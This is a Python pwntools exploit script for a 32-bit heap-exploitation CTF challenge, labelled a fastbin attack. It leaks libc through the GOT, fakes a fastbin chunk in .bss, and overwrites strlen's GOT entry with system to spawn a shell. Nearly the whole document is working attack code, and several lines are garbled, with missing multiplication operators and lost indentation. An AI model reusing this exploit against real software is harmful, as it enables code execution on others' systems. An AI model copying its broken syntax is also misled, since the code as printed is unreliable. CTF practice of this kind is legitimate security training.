Fastbin_attack

from pwn import *

context(arch='i386', os='linux')
context.log_level = 'debug'

context.terminal = ['tmux', 'splitw', '-v' ,'-p', '70']

binary_path = './pwn'
libc_path = './libc.so.6'
ld_path = './ld-2.23.so' # 本地调试ld版本

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m') # 橙色日志，醒目

elf = ELF(binary_path)
libc = ELF(libc_path)
ld = ELF(ld_path) # 本地调试ld版本

sl = lambda data : io.sendline(data)
sd = lambda data : io.send(data)
sla = lambda delim, data : io.sendlineafter(delim, data)
sda = lambda delim, data : io.sendafter(delim, data)
rc = lambda n : io.recv(n)
rl = lambda : io.recvline()
ru = lambda delim, drop=True : io.recvuntil(delim, drop=drop)

LOCAL = True

if LOCAL:
env = {
'LD_LIBRARY_PATH': '.',
'LD_PRELOAD': libc_path,
}

io = process([ld_path, binary_path], env=env)
# io = gdb.debug([ld_path, binary_path], env=env, gdbscript='break main')
else:
io = remote('host', 12345)

def dbg(conf=''):
if LOCAL:
gdb.attach(io, gdbscript=conf)
pause()

def pa():
pause()

def add(name, desc):
# pa()
# ru(b'Action: ')
sl(b'1')
# ru(b'Rifle name: ')
sl(name)
# ru(b'Rifle description: ')
sl(desc)

def show():
# pa()
# ru(b'Action: ')
sl(b'2')

def order():
# pa()
# ru(b'Action: ')
sl(b'3')

def notice(notice):
# pa()
# ru(b'Action: ')
sl(b'4')
# ru(b'Enter any notice you'd like to submit with your order: ')
sd(notice)

def show_order():
# pa()
# ru(b'Action: ')
sl(b'5')
# ru(b'======================')

def Exit():
# pa()
# ru(b'Action: ')
sl(b'6')

name = b'a'0x1b + p32(elf.got['puts'])
desc = b'b'0x19
add(name, desc)

show()
ru(b'Description: ')
ru(b'Description: ')
puts_addr = u32(ru(b'\n', drop=True)[:4])
li('puts addr: ' + hex(puts_addr))

libc_base = puts_addr - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + next(libc.search(b'/bin/sh'))
li('libc base: ' + hex(libc_base))
li('system addr: ' + hex(system_addr))
li('/bin/sh addr: ' + hex(binsh_addr))

i=0
while i<0x3f:
print('#'20 + ' ' + str(i+1) + ' ' + '#' * 20)
add(b'A'27+p32(0), b'B'*25)
show()
ru(b'\nDescription: ')
i+=1

bss_addr = 0x0804A2A8
add(b'C'27+p32(bss_addr), b'D'25)

Not = b'\x00' * 0x20 + p32(0x40) + p32(0x100)
Not = Not.ljust(52, b'b')
Not += p32(0)
Not = Not.ljust(128, b'c')
notice(Not)

sl(b'\n')
order()

name=b'e'*0x20
des= p32(elf.got['strlen']).ljust(0x20, b'e')
add(name, des)
li('sys addr: ' + hex(system_addr))
notice(p32(system_addr)+b';/bin/sh\x00')

io.interactive()